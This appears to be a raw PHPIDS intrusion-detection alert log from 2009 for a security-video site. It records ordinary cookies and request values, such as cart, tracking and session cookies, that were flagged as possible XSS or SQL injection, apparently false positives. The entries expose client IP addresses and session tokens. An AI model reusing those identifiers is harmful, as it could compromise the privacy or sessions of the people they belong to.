Name:REQUEST.CommunityServer-UserCookie1001
Value:lv=1/1/1999 12:00:00 AM&mra=11/7/2009 2:37:24 PM
Page:/i.php?page=videos%2Fncat-nmap-netcat
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:43
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:59345
Name:COOKIE.Cart
Value:PHRoutine=10&Referer=&Landing=http://www.tigerdirect.com/applications/searchtools/item-details.asp?EdpNo=5344797&SRCCODE=WEBRSS013&cm_mmc=RSS-_-TigerDirect-_-Category-_-TopSellers
Page:/i.php?page=videos%2Fpn12%2Frussell-butturini-using-the-hak5-u3-switchblade-as-an-incident-response-and-forensics-tool
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:43
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59346
Name:REQUEST.DB
Value:msRandX=61&ItemDetailsBeta=Y&msProduct=1782290&Surveyflag=1&msImageID=/microsoft/MSelasticity-bnr_430x150B.jpg&msImageSC=/microsoft/MSelasticity-bnr_620x150B.jpg
Page:/i.php?page=videos%2Fncat-nmap-netcat
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:43
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:59347
Name:COOKIE.Apache
Value:"A~23b8ca97e0c9e5cf95e5b207ac990469"
Page:/i.php?page=videos%2Fpn12%2Frussell-butturini-using-the-hak5-u3-switchblade-as-an-incident-response-and-forensics-tool
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:43
Details:
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 2.3333333333333

ID:59348
Name:REQUEST.Cart
Value:PHRoutine=10&Referer=&Landing=http://www.tigerdirect.com/applications/searchtools/item-details.asp?EdpNo=5344797&SRCCODE=WEBRSS013&cm_mmc=RSS-_-TigerDirect-_-Category-_-TopSellers
Page:/i.php?page=videos%2Fncat-nmap-netcat
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:43
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59349
Name:COOKIE.ci_session
Value:a:4:{s:10:"session_id";s:32:"6fbc57e6ed56e70b3dbdce89d8d6a84f";s:10:"ip_address";s:14:"87.118.122.162";s:10:"user_agent";s:50:"Mozilla/5.0 (compatible; proximic; +http://www.pro";s:13:"last_activity";s:10:"1257671895";}2566dca70673b42e8b5426c2622c30bd
Page:/i.php?page=videos%2Fpn12%2Frussell-butturini-using-the-hak5-u3-switchblade-as-an-incident-response-and-forensics-tool
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:43
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: (((++:

ID:59350
Name:REQUEST.Apache
Value:"A~23b8ca97e0c9e5cf95e5b207ac990469"
Page:/i.php?page=videos%2Fncat-nmap-netcat
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:43
Details:
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 2.3333333333333

ID:59351
Name:REQUEST.ci_session
Value:a:4:{s:10:"session_id";s:32:"6fbc57e6ed56e70b3dbdce89d8d6a84f";s:10:"ip_address";s:14:"87.118.122.162";s:10:"user_agent";s:50:"Mozilla/5.0 (compatible; proximic; +http://www.pro";s:13:"last_activity";s:10:"1257671895";}2566dca70673b42e8b5426c2622c30bd
Page:/i.php?page=videos%2Fncat-nmap-netcat
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:43
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: (((++:

ID:59352
Name:COOKIE.language
Value:--
Page:/i.php?page=videos%2Fncat-nmap-netcat
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:43
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:59353
Name:COOKIE.cm__tracker
Value:a:1:{i:0;s:54:"/blog/post/2933/a-new-look-for-system-emails-and-more/";}
Page:/i.php?page=videos%2Fncat-nmap-netcat
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:43
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59354
Name:COOKIE.exp_tracker
Value:a:4:{i:0;s:67:"/weblog/artikel/Welche-Werkzeuge-verwendet-ihr-zur-Web-Entwicklung/";i:1;s:18:"/events/detail/p1/";i:2;s:62:"/article/419-cbs-call-redstone-light-at-the-end-of-the-tunnel/";i:3;s:54:"/article/419-inside-word-in-defense-of-ads-in-twitter/";}
Page:/i.php?page=videos%2Fncat-nmap-netcat
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:43
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59355
Name:COOKIE.CFGLOBALS
Value:urltoken=CFID#=1654852&CFTOKEN#=87450961&jsessionid#=3030f94bb9262e539f40916a2e4f2c286c71#lastvisit={ts '2009-11-07 15:45:29'}#timecreated={ts '2009-11-07 10:17:11'}#hitcount=16#cftoken=87450961#cfid=1654852#
Page:/i.php?page=videos%2Fncat-nmap-netcat
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:43
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.2307692307692
Converted: ((((+::

ID:59356
Name:COOKIE.CommunityServer-UserCookie1001
Value:lv=1/1/1999 12:00:00 AM&mra=11/7/2009 2:37:24 PM
Page:/i.php?page=videos%2Fncat-nmap-netcat
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:43
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:59357
Name:COOKIE.DB
Value:msRandX=61&ItemDetailsBeta=Y&msProduct=1782290&Surveyflag=1&msImageID=/microsoft/MSelasticity-bnr_430x150B.jpg&msImageSC=/microsoft/MSelasticity-bnr_620x150B.jpg
Page:/i.php?page=videos%2Fncat-nmap-netcat
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:43
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:59358
Name:COOKIE.Cart
Value:PHRoutine=10&Referer=&Landing=http://www.tigerdirect.com/applications/searchtools/item-details.asp?EdpNo=5344797&SRCCODE=WEBRSS013&cm_mmc=RSS-_-TigerDirect-_-Category-_-TopSellers
Page:/i.php?page=videos%2Fncat-nmap-netcat
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:43
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59359
Name:COOKIE.Apache
Value:"A~23b8ca97e0c9e5cf95e5b207ac990469"
Page:/i.php?page=videos%2Fncat-nmap-netcat
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:43
Details:
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 2.3333333333333

ID:59360
Name:COOKIE.ci_session
Value:a:4:{s:10:"session_id";s:32:"6fbc57e6ed56e70b3dbdce89d8d6a84f";s:10:"ip_address";s:14:"87.118.122.162";s:10:"user_agent";s:50:"Mozilla/5.0 (compatible; proximic; +http://www.pro";s:13:"last_activity";s:10:"1257671895";}2566dca70673b42e8b5426c2622c30bd
Page:/i.php?page=videos%2Fncat-nmap-netcat
IP:87.118.122.162
Impact:220
Created:2009-11-07 17:37:43
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: ---
Ratio: ---
Converted: (((++:

ID:59361
Name:REQUEST.language
Value:--
Page:/i.php?page=videos%2Fincident-response-u3-switchblade
IP:213.239.213.230
Impact:208
Created:2009-11-07 17:37:43
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:59362
Name:REQUEST.DB
Value:msRandX=47&ItemDetailsBeta=Y&msProduct=1782290&Surveyflag=1&msImageID=/microsoft/MSelasticity-bnr_430x150B.jpg&msImageSC=/microsoft/MSelasticity-bnr_620x150B.jpg
Page:/i.php?page=videos%2Fincident-response-u3-switchblade
IP:213.239.213.230
Impact:208
Created:2009-11-07 17:37:43
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:59363
Name:REQUEST.Cart
Value:PHRoutine=10&Referer=&Landing=http://www.tigerdirect.com/applications/searchtools/item-details.asp?EdpNo=3283217&SRCCODE=WEBRSS013&cm_mmc=RSS-_-TigerDirect-_-Category-_-TopSellers
Page:/i.php?page=videos%2Fincident-response-u3-switchblade
IP:213.239.213.230
Impact:208
Created:2009-11-07 17:37:43
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59364
Name:REQUEST.cm__tracker
Value:a:2:{i:0;s:36:"/gallery/entry/2910/venture-visuals/";i:1;s:36:"/gallery/entry/2903/finders-keepers/";}
Page:/i.php?page=videos%2Fincident-response-u3-switchblade
IP:213.239.213.230
Impact:208
Created:2009-11-07 17:37:43
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59365
Name:REQUEST.IW
Value:SendToAFriend=http://www.industryweek.com/readarticle.aspx?ArticleID=20134
Page:/i.php?page=videos%2Fincident-response-u3-switchblade
IP:213.239.213.230
Impact:208
Created:2009-11-07 17:37:43
Details:
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59366
Name:REQUEST.exp_tracker
Value:a:4:{i:0;s:53:"/weblog/artikel/Wordpress-mit-Readernaut-verheiraten/";i:1;s:55:"/events/detail/childrens-book-sale-september-12th-13th/";i:2;s:18:"/events/detail/p3/";i:3;s:43:"/don-irvine-blog/the-real-bias-is-moderate/";}
Page:/i.php?page=videos%2Fincident-response-u3-switchblade
IP:213.239.213.230
Impact:208
Created:2009-11-07 17:37:43
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59367
Name:REQUEST.ecm
Value:user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=instoresnow.walmart.com&SiteLanguage=1033
Page:/i.php?page=videos%2Fincident-response-u3-switchblade
IP:213.239.213.230
Impact:208
Created:2009-11-07 17:37:43
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30

ID:59368
Name:REQUEST.CommunityServer-UserCookie1001
Value:lv=1/1/1999 12:00:00 AM&mra=Sat, 07 Nov 2009 18:18:46 GMT
Page:/i.php?page=videos%2Fincident-response-u3-switchblade
IP:213.239.213.230
Impact:208
Created:2009-11-07 17:37:43
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:59369
Name:REQUEST.CFGLOBALS
Value:urltoken=CFID#=2033299&CFTOKEN#=14336522&jsessionid#=30304d576e822d946f6006e40437b6110e4f#lastvisit={ts '2009-11-07 19:50:17'}#timecreated={ts '2009-11-07 11:47:25'}#hitcount=16#cftoken=58611329#cfid=1658835#
Page:/i.php?page=videos%2Fincident-response-u3-switchblade
IP:213.239.213.230
Impact:208
Created:2009-11-07 17:37:43
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.2307692307692
Converted: ((((+::

ID:59370
Name:COOKIE.language
Value:--
Page:/i.php?page=videos%2Fincident-response-u3-switchblade
IP:213.239.213.230
Impact:208
Created:2009-11-07 17:37:43
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:59371
Name:COOKIE.DB
Value:msRandX=47&ItemDetailsBeta=Y&msProduct=1782290&Surveyflag=1&msImageID=/microsoft/MSelasticity-bnr_430x150B.jpg&msImageSC=/microsoft/MSelasticity-bnr_620x150B.jpg
Page:/i.php?page=videos%2Fincident-response-u3-switchblade
IP:213.239.213.230
Impact:208
Created:2009-11-07 17:37:43
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:59372
Name:COOKIE.Cart
Value:PHRoutine=10&Referer=&Landing=http://www.tigerdirect.com/applications/searchtools/item-details.asp?EdpNo=3283217&SRCCODE=WEBRSS013&cm_mmc=RSS-_-TigerDirect-_-Category-_-TopSellers
Page:/i.php?page=videos%2Fincident-response-u3-switchblade
IP:213.239.213.230
Impact:208
Created:2009-11-07 17:37:43
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59373
Name:COOKIE.cm__tracker
Value:a:2:{i:0;s:36:"/gallery/entry/2910/venture-visuals/";i:1;s:36:"/gallery/entry/2903/finders-keepers/";}
Page:/i.php?page=videos%2Fincident-response-u3-switchblade
IP:213.239.213.230
Impact:208
Created:2009-11-07 17:37:43
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59374
Name:COOKIE.IW
Value:SendToAFriend=http://www.industryweek.com/readarticle.aspx?ArticleID=20134
Page:/i.php?page=videos%2Fincident-response-u3-switchblade
IP:213.239.213.230
Impact:208
Created:2009-11-07 17:37:43
Details:
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59375
Name:COOKIE.exp_tracker
Value:a:4:{i:0;s:53:"/weblog/artikel/Wordpress-mit-Readernaut-verheiraten/";i:1;s:55:"/events/detail/childrens-book-sale-september-12th-13th/";i:2;s:18:"/events/detail/p3/";i:3;s:43:"/don-irvine-blog/the-real-bias-is-moderate/";}
Page:/i.php?page=videos%2Fincident-response-u3-switchblade
IP:213.239.213.230
Impact:208
Created:2009-11-07 17:37:43
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59376
Name:COOKIE.ecm
Value:user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=instoresnow.walmart.com&SiteLanguage=1033
Page:/i.php?page=videos%2Fincident-response-u3-switchblade
IP:213.239.213.230
Impact:208
Created:2009-11-07 17:37:43
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30

ID:59377
Name:COOKIE.CommunityServer-UserCookie1001
Value:lv=1/1/1999 12:00:00 AM&mra=Sat, 07 Nov 2009 18:18:46 GMT
Page:/i.php?page=videos%2Fincident-response-u3-switchblade
IP:213.239.213.230
Impact:208
Created:2009-11-07 17:37:43
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:59378
Name:COOKIE.CFGLOBALS
Value:urltoken=CFID#=2033299&CFTOKEN#=14336522&jsessionid#=30304d576e822d946f6006e40437b6110e4f#lastvisit={ts '2009-11-07 19:50:17'}#timecreated={ts '2009-11-07 11:47:25'}#hitcount=16#cftoken=58611329#cfid=1658835#
Page:/i.php?page=videos%2Fincident-response-u3-switchblade
IP:213.239.213.230
Impact:208
Created:2009-11-07 17:37:43
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.2307692307692
Converted: ((((+::

ID:59237
Name:REQUEST.PREF
Value:ID=341f2d18c0030793:TM=1257613886:LM=1257613886:S=xZVyiwGwz5KQUvzW
Page:/i.php?page=videos%2Fpn12%2Fscott-moulton-at-least-ten-things-you-didnt-know-about-your-hard-drive
IP:213.239.213.52
Impact:162
Created:2009-11-07 17:37:42
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27

ID:59238
Name:REQUEST.language
Value:--
Page:/i.php?page=videos%2Fpn12%2Fscott-moulton-at-least-ten-things-you-didnt-know-about-your-hard-drive
IP:213.239.213.52
Impact:162
Created:2009-11-07 17:37:42
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:59239
Name:REQUEST.cm__tracker
Value:a:1:{i:0;s:31:"/gallery/entry/2895/avant-card/";}
Page:/i.php?page=videos%2Fpn12%2Fscott-moulton-at-least-ten-things-you-didnt-know-about-your-hard-drive
IP:213.239.213.52
Impact:162
Created:2009-11-07 17:37:42
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59240
Name:REQUEST.CommunityServer-UserCookie1001
Value:lv=1/1/1999 12:00:00 AM&mra=11/7/2009 11:26:48 AM
Page:/i.php?page=videos%2Fpn12%2Fscott-moulton-at-least-ten-things-you-didnt-know-about-your-hard-drive
IP:213.239.213.52
Impact:162
Created:2009-11-07 17:37:42
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:59241
Name:REQUEST.IW
Value:SendToAFriend=http://www.industryweek.com/readarticle.aspx?ArticleID=20342
Page:/i.php?page=videos%2Fpn12%2Fscott-moulton-at-least-ten-things-you-didnt-know-about-your-hard-drive
IP:213.239.213.52
Impact:162
Created:2009-11-07 17:37:42
Details:
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59242
Name:REQUEST.exp_tracker
Value:a:4:{i:0;s:75:"/article/apple_to_open_stunning_paris_apple_store_in_le_louvre_on_saturday/";i:1;s:33:"/blog/sxsw-panel-picker-overload/";i:2;s:74:"/apple/comment/sleek-audio-announces-more-affordable-sa1-in-ear-earphones/";i:3;s:92:"/weblog/artikel/A-Practical-Guide-to-Designing-for-the-Web-von-Mark-Boulton-A-book-by-Mark-/";}
Page:/i.php?page=videos%2Fpn12%2Fscott-moulton-at-least-ten-things-you-didnt-know-about-your-hard-drive
IP:213.239.213.52
Impact:162
Created:2009-11-07 17:37:42
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59243
Name:REQUEST.CFGLOBALS
Value:urltoken=CFID#=1654854&CFTOKEN#=61107507&jsessionid#=3030d711a181a912d333354718d793c534e4#lastvisit={ts '2009-11-07 19:50:06'}#timecreated={ts '2009-11-07 10:17:12'}#hitcount=6#cftoken=60223183#cfid=1654853#
Page:/i.php?page=videos%2Fpn12%2Fscott-moulton-at-least-ten-things-you-didnt-know-about-your-hard-drive
IP:213.239.213.52
Impact:162
Created:2009-11-07 17:37:42
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.1923076923077
Converted: ((((+::

ID:59244
Name:COOKIE.PREF
Value:ID=341f2d18c0030793:TM=1257613886:LM=1257613886:S=xZVyiwGwz5KQUvzW
Page:/i.php?page=videos%2Fpn12%2Fscott-moulton-at-least-ten-things-you-didnt-know-about-your-hard-drive
IP:213.239.213.52
Impact:162
Created:2009-11-07 17:37:42
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27

ID:59245
Name:COOKIE.language
Value:--
Page:/i.php?page=videos%2Fpn12%2Fscott-moulton-at-least-ten-things-you-didnt-know-about-your-hard-drive
IP:213.239.213.52
Impact:162
Created:2009-11-07 17:37:42
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:59246
Name:COOKIE.cm__tracker
Value:a:1:{i:0;s:31:"/gallery/entry/2895/avant-card/";}
Page:/i.php?page=videos%2Fpn12%2Fscott-moulton-at-least-ten-things-you-didnt-know-about-your-hard-drive
IP:213.239.213.52
Impact:162
Created:2009-11-07 17:37:42
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59247
Name:COOKIE.CommunityServer-UserCookie1001
Value:lv=1/1/1999 12:00:00 AM&mra=11/7/2009 11:26:48 AM
Page:/i.php?page=videos%2Fpn12%2Fscott-moulton-at-least-ten-things-you-didnt-know-about-your-hard-drive
IP:213.239.213.52
Impact:162
Created:2009-11-07 17:37:42
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:59248
Name:COOKIE.IW
Value:SendToAFriend=http://www.industryweek.com/readarticle.aspx?ArticleID=20342
Page:/i.php?page=videos%2Fpn12%2Fscott-moulton-at-least-ten-things-you-didnt-know-about-your-hard-drive
IP:213.239.213.52
Impact:162
Created:2009-11-07 17:37:42
Details:
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59249
Name:COOKIE.exp_tracker
Value:a:4:{i:0;s:75:"/article/apple_to_open_stunning_paris_apple_store_in_le_louvre_on_saturday/";i:1;s:33:"/blog/sxsw-panel-picker-overload/";i:2;s:74:"/apple/comment/sleek-audio-announces-more-affordable-sa1-in-ear-earphones/";i:3;s:92:"/weblog/artikel/A-Practical-Guide-to-Designing-for-the-Web-von-Mark-Boulton-A-book-by-Mark-/";}
Page:/i.php?page=videos%2Fpn12%2Fscott-moulton-at-least-ten-things-you-didnt-know-about-your-hard-drive
IP:213.239.213.52
Impact:162
Created:2009-11-07 17:37:42
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59250
Name:COOKIE.CFGLOBALS
Value:urltoken=CFID#=1654854&CFTOKEN#=61107507&jsessionid#=3030d711a181a912d333354718d793c534e4#lastvisit={ts '2009-11-07 19:50:06'}#timecreated={ts '2009-11-07 10:17:12'}#hitcount=6#cftoken=60223183#cfid=1654853#
Page:/i.php?page=videos%2Fpn12%2Fscott-moulton-at-least-ten-things-you-didnt-know-about-your-hard-drive
IP:213.239.213.52
Impact:162
Created:2009-11-07 17:37:42
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.1923076923077
Converted: ((((+::

ID:59251
Name:REQUEST.PREF
Value:ID=341f2d18c0030793:TM=1257613886:LM=1257613886:S=xZVyiwGwz5KQUvzW
Page:/i.php?page=videos%2Fpn12%2Ftrip-discussion-of-the-legality-of-wardriving
IP:213.239.213.52
Impact:162
Created:2009-11-07 17:37:42
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27

ID:59252
Name:REQUEST.language
Value:--
Page:/i.php?page=videos%2Fpn12%2Ftrip-discussion-of-the-legality-of-wardriving
IP:213.239.213.52
Impact:162
Created:2009-11-07 17:37:42
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:59253
Name:REQUEST.cm__tracker
Value:a:1:{i:0;s:31:"/gallery/entry/2895/avant-card/";}
Page:/i.php?page=videos%2Fpn12%2Ftrip-discussion-of-the-legality-of-wardriving
IP:213.239.213.52
Impact:162
Created:2009-11-07 17:37:42
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59254
Name:REQUEST.CommunityServer-UserCookie1001
Value:lv=1/1/1999 12:00:00 AM&mra=11/7/2009 11:26:48 AM
Page:/i.php?page=videos%2Fpn12%2Ftrip-discussion-of-the-legality-of-wardriving
IP:213.239.213.52
Impact:162
Created:2009-11-07 17:37:42
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:59255
Name:REQUEST.IW
Value:SendToAFriend=http://www.industryweek.com/readarticle.aspx?ArticleID=20342
Page:/i.php?page=videos%2Fpn12%2Ftrip-discussion-of-the-legality-of-wardriving
IP:213.239.213.52
Impact:162
Created:2009-11-07 17:37:42
Details:
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59256
Name:REQUEST.exp_tracker
Value:a:4:{i:0;s:75:"/article/apple_to_open_stunning_paris_apple_store_in_le_louvre_on_saturday/";i:1;s:33:"/blog/sxsw-panel-picker-overload/";i:2;s:74:"/apple/comment/sleek-audio-announces-more-affordable-sa1-in-ear-earphones/";i:3;s:92:"/weblog/artikel/A-Practical-Guide-to-Designing-for-the-Web-von-Mark-Boulton-A-book-by-Mark-/";}
Page:/i.php?page=videos%2Fpn12%2Ftrip-discussion-of-the-legality-of-wardriving
IP:213.239.213.52
Impact:162
Created:2009-11-07 17:37:42
Details:
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
